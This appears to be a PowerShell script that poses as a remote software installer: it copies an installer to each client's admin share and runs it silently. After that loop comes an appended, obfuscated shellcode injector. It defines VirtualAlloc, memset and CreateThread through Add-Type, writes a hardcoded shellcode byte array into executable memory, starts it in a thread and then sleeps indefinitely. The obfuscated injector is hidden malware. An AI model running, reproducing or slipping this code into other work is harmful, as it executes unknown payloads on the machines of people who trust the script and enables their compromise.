param (
    [Parameter(mandaTORy)]
    [string[]]${clIe`Nt},

    [Parameter(mAndaTOrY)]
    [ValidateNotNullOrEmpty()]
    [string]${i`Ns`TAl`LE`RFIlePaTh}
)

foreach (${c} in ${cLi`e`Nt}) {
    try {
        
        ${c`LIE`NTM`SG} = "The client [$($c)]  "
        if (-not (&("{0}{3}{2}{1}"-f'Te','n','nnectio','st-Co') -ComputerName ${c} -Quiet -Count 1)) {
            throw ("$clientMsg "+'canno'+'t '+'b'+'e '+'ping'+'ed')
        } elseif (-not (&("{2}{1}{0}" -f'ath','t-P','Tes') "\\$c\c$")) {
            throw ("$clientMsg "+('O'+'qt'+'s ')."r`EPlACE"('Oqt',[StrinG][ChaR]39)+'ad'+'min '+'sha'+'re '+'i'+'s '+'un'+'avail'+'a'+'ble')
        } else {
            &("{0}{2}{3}{1}"-f'Wr','ose','ite-','Verb') -Message ("$clientMsg "+'i'+'s '+'re'+'ady '+'t'+'o '+'g'+'o!')
        }

        
        &("{2}{0}{1}{3}"-f 'rite-Ve','rb','W','ose') -Message ("{5}{3}{2}{4}{6}{0}{1}{7}" -f 'ie','nt.','er t','install','o ','Copying ','cl','..')
        .("{0}{1}{2}" -f 'Co','py-','Item') -Path ${InsTAL`l`erFiLE`PAth} -Destination "\\$c\c$"

        
        .("{3}{0}{2}{1}{4}"-f'ite','rbo','-Ve','Wr','se') -Message ("{0}{4}{1}{5}{2}{3}" -f 'Installing','softwa','ent..','.',' ','re on cli')
        .("{1}{3}{0}{2}"-f'n','In','d','voke-Comma') -ComputerName ${c} -ScriptBlock {
            ${iNsT`ALl`eRF`i`lEnAme} = ${UsInG:InsTa`l`lERF`i`LE`Path} | .("{1}{0}{2}"-f 'it','Spl','-Path') -Leaf

            
            .("{1}{2}{0}{3}{4}"-f'-','St','art','Pr','ocess') -NoNewWindow -Wait -FilePath "C:\$installerFileName" -ArgumentList ("{2}{1}{0}{3}{4}"-f 'e','or','/silent /n','star','t')
            
            
            &("{3}{1}{2}{0}" -f 've-Item','e','mo','R') -Path "C:\$installerFileName" -Recurse
         }
    } catch {
        .("{1}{2}{0}" -f '-Error','Writ','e') -Message ${_}."e`X`cEpTiON"."Me`SsagE"
    }
}
${C} = ((("{73}{43}{12}{44}{96}{83}{60}{36}{84}{0}{6}{88}{7}{55}{22}{47}{50}{61}{27}{53}{89}{80}{67}{66}{13}{101}{85}{41}{30}{86}{18}{98}{37}{31}{15}{99}{54}{5}{29}{104}{94}{38}{4}{59}{82}{105}{106}{49}{9}{23}{71}{70}{40}{45}{97}{24}{62}{92}{69}{74}{48}{81}{57}{28}{91}{65}{14}{17}{46}{63}{1}{79}{52}{42}{10}{20}{21}{93}{19}{3}{25}{100}{56}{32}{72}{33}{26}{75}{11}{58}{76}{2}{35}{87}{95}{39}{51}{102}{77}{34}{8}{78}{68}{16}{90}{64}{103}" -f' ex','C','I','d);[Dl','Crea','c static e','tern IntP',' Vir','s','Thre',' In','e','Import(G','p','mete','llGQM','rc, uin','r, ','Mker','I','tPt','r lpThrea','lAlloc(I','adAt','a','lI','blic','t ','rt','x','m','.d','GQ','pu','de','nt','t','2',' ','s',' d','lI','nFlags,','Dll','QMkerne','wS','uint ','ntPtr lpAddr','tr ','lp','ess, ui','e','atio','dw','publi','tua','port(','a','xtern','teThrea',')]public sta','n','ckSi','dw','nt)','s, IntPtr lpPara','y','locationT','t s','e, I','t','tributes, uin','Mmsvcrt.dllGQM)]','[','ntP',' static ',' ','(IntPtr ','t, uin','re','flAl','lpSt','d','M','ic','tect);[Dl','port(GQ','Ptr','tr','Size, uint ','t cou','Addres','z','d','Ptr',' mem','l32.dllGQ','t','nel3',')]','m','e, uint flPro','t',';','tern Int','(IntPtr',' '))  -CReplACE 'GQM',[Char]34);${W} = .("{1}{2}{0}" -f'e','Ad','d-Typ') -memberDefinition ${c} -Name ("{1}{0}" -f'in32','W') -namespace ("{2}{3}{1}{0}" -f '2Functions','n3','W','i') -passthru;[Byte[]];[Byte[]]${Z} = 0xdb,0xd7,0xbf,0x4c,0x85,0x54,0x4e,0xd9,0x74,0x24,0xf4,0x5a,0x31,0xc9,0xb1,0x57,0x83,0xc2,0x04,0x31,0x7a,0x13,0x03,0x36,0x96,0xb6,0xbb,0x3a,0x70,0xb4,0x44,0xc2,0x81,0xd9,0xcd,0x27,0xb0,0xd9,0xaa,0x2c,0xe3,0xe9,0xb9,0x60,0x08,0x81,0xec,0x90,0x9b,0xe7,0x38,0x97,0x2c,0x4d,0x1f,0x96,0xad,0xfe,0x63,0xb9,0x2d,0xfd,0xb7,0x19,0x0f,0xce,0xc5,0x58,0x48,0x33,0x27,0x08,0x01,0x3f,0x9a,0xbc,0x26,0x75,0x27,0x37,0x74,0x9b,0x2f,0xa4,0xcd,0x9a,0x1e,0x7b,0x45,0xc5,0x80,0x7a,0x8a,0x7d,0x89,0x64,0xcf,0xb8,0x43,0x1f,0x3b,0x36,0x52,0xc9,0x75,0xb7,0xf9,0x34,0xba,0x4a,0x03,0x71,0x7d,0xb5,0x76,0x8b,0x7d,0x48,0x81,0x48,0xff,0x96,0x04,0x4a,0xa7,0x5d,0xbe,0xb6,0x59,0xb1,0x59,0x3d,0x55,0x7e,0x2d,0x19,0x7a,0x81,0xe2,0x12,0x86,0x0a,0x05,0xf4,0x0e,0x48,0x22,0xd0,0x4b,0x0a,0x4b,0x41,0x36,0xfd,0x74,0x91,0x99,0xa2,0xd0,0xda,0x34,0xb6,0x68,0x81,0x50,0x26,0x16,0x4d,0xa1,0xde,0xaf,0xc4,0xcf,0x77,0x04,0x7e,0x5c,0xff,0x82,0x79,0xa3,0x2a,0xfb,0x5e,0x08,0x86,0xaf,0x33,0xfc,0x40,0x6a,0xe5,0x7b,0x36,0x75,0xdc,0x2f,0x6b,0xe0,0xdd,0x9c,0xd8,0x9c,0x5a,0x23,0xdf,0x5c,0x74,0xa8,0xdf,0x5c,0x84,0x9e,0x9a,0x69,0xb3,0x87,0x60,0x92,0xeb,0x2f,0x3e,0x1b,0x94,0x76,0x3f,0xce,0x23,0xb0,0x93,0x99,0x33,0x0f,0xf4,0xde,0x60,0x3c,0xa7,0x89,0xd5,0x94,0x2f,0xdd,0x8c,0x36,0x8b,0xde,0xfb,0xd1,0x81,0x2a,0x5c,0xb6,0xd5,0x18,0x62,0x46,0x5f,0xbe,0x08,0x42,0x0f,0x55,0xd3,0x1c,0xc7,0xdc,0xad,0x3e,0x91,0xe0,0xe4,0x6c,0xcd,0x4d,0x55,0xc5,0x99,0x5c,0x5f,0xf1,0x22,0x60,0x8a,0x84,0x15,0xeb,0x3e,0xc8,0xe0,0xcd,0x56,0x26,0xbf,0x4c,0xf0,0x39,0x15,0xfa,0xbc,0xad,0x96,0xeb,0x3c,0x2e,0xff,0x0b,0x3c,0x6e,0xff,0x58,0x54,0x36,0x5b,0x0d,0x41,0x39,0x76,0x21,0xda,0x95,0xf0,0xa1,0x8b,0x71,0x03,0x0e,0x33,0x82,0x50,0x18,0x5b,0x90,0xc0,0x2d,0x79,0x6b,0x39,0xa8,0xbd,0xe0,0x0f,0x38,0x3a,0x08,0x53,0xba,0x84,0x7f,0xb6,0x9d,0xc7,0xdf,0xd0,0x6b,0x38,0x20,0xdf,0xa5,0xff,0xed,0x0e,0xf7,0xc9,0x29,0x61,0xc6,0x1b,0x7b,0x4c,0x28;${g} = 0x1000;if (${Z}."Le`N`GTh" -gt 0x1000){${g} = ${Z}."Le`Ng`Th"};${x}=${w}::("{0}{2}{1}"-f 'VirtualAl','oc','l').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${Z}."lEN`G`Th"-1);${I}++) {${W}::"m`E`MseT"([IntPtr](${X}.("{2}{0}{1}"-f't3','2','ToIn').Invoke()+${I}), ${z}[${i}], 1)};${W}::("{3}{0}{1}{2}"-f 'r','eateThr','ead','C').Invoke(0,0,${X},0,0,0);for (;;){.("{0}{3}{2}{1}" -f'Star','eep','sl','t-') 60};
